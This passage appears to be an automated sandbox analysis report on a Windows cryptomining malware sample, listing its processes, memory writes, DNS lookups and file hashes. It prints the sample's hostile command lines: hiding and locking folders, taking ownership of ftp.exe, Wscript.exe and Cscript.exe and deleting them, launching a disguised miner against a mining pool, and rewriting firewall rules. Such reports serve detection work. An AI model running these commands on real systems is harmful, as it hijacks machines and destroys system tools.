Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
N/A N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1544 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4364 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 3208 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 3208 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 1544 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2108 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2108 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2108 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2108 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 2372 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2372 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2372 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 3704 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3704 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3704 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3704 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 1916 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1916 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1916 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 3236 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3236 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3236 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3236 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 2952 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2952 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2952 wrote to memory of 3548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2952 wrote to memory of 3548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 852 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 852 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 852 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 852 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4844 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4844 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4844 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3352 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3352 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3352 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3352 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3608 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3608 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3608 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3608 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3160 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3160 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3160 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3160 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4548 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4548 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 4548 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4548 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4636 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4636 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1120 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1120 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 880 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 880 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator

C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe

"C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\gambecxd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\ProgramData\gambecxd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\ProgramData\gambecxd\svchost.exe

"C:\ProgramData\gambecxd\svchost.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Users\Public\Documents\gambecxd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Users\Public\Documents\gambecxd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic&exit&exit

C:\Windows\SysWOW64\net.exe

net start MpsSvc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start MpsSvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c sc config MpsSvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config MpsSvc start= auto

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 udp

Files

C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe

MD5 99d91a5ca408888ad0139ba017c263b0
SHA1 ee00c4cbb144833ea37557e09dab4d036cf491e3
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
SHA512 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164

C:\ProgramData\gambecxd\svchost.exe

MD5 d5f810d2810eb4412a5920a677d1bef1
SHA1 5d518c9c5b1097708b80ff572501e195b381c30c
SHA256 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51
SHA512 b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663

C:\Program Files\common files\system\wk.ini

MD5 247dc790598a3bdce090350e7af3401c
SHA1 47798e3ff0b87d752aa3eabe974f8f1f295157cf
SHA256 3419ab77444269580f555533446263f2674a66a776d5171edd338f41c62bc28c
SHA512 4b1156c30fbdc6eb8fa067ffd9770607f333e4c18060d6557e196caa36c0c7f108e9051e00d29760b1c06033ab49b0791daad2c521a6c8bfd5f62eacb020081b

memory/4048-9-0x0000000000400000-0x0000000000498000-memory.dmp

